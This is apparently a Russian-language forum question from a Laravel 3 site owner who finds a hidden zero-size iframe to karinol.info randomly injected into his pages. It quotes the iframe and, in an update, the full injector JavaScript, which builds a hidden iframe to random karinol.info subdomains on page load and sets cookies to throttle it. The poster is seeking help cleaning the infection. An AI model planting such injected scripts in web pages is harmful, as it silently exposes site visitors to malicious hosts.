Добрый день, на сайте случайным образом появляется следующий iframe. Сайт на fw laravel 3
<iframe src="http://satiram.karinol.info" width="0" height="0" align="left"></iframe>
он может появится в любой части при просмотре исходного кода. Появляется когда ему вздумается. Исходники сайта чистые, левых строк в файлах конфигурации nginx и httpd нет… Куда копать?
UPD. grep -r «karinol». ничего не дает
P.S. как проверить картинки на наличие вредоносного кода?
UPD 2. Единственное упоминание о вирусе
};var ifbsTkv = document.createElement('iframe');ifbsTkv.name = 'ifbsTkv';ifbsTkv.src = 'http://'+genstrdom(Math.floor(Math.random() * 20) + 5)+'.'+'karinol.info/';ifbsTkv.style.width = '0px';ifbsTkv.style.height = '0px';window.onload = function() {document.cookie = 'chcook=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT'; if ((document.cookie.indexOf('ifbsTkv=') == -1) && (document.cookie.indexOf('chcook=') != -1)) { document.getElementsByTagName('body')[0].appendChild(ifbsTkv);var expiresDate = new Date(); expiresDate.setTime(expiresDate.getTime() + 432000000); setTimeout(function() { document.cookie = 'ifbsTkv=yes; path=/; expires=' + expiresDate; }, 5000);}};function genstrdom(length) {var st = '';var chars = 'abcdefghijklmnopqrstuvwxyz0123456789';for (i=1;i<length;i++) {var c = Math.floor(Math.random()*chars.length + 1);st += chars.charAt(c)}return st;}<span style="line-height: 1.6em;"></span>
urlvir.ru/blog/99-novyj-vid-virusa-shturmuet-inter... 
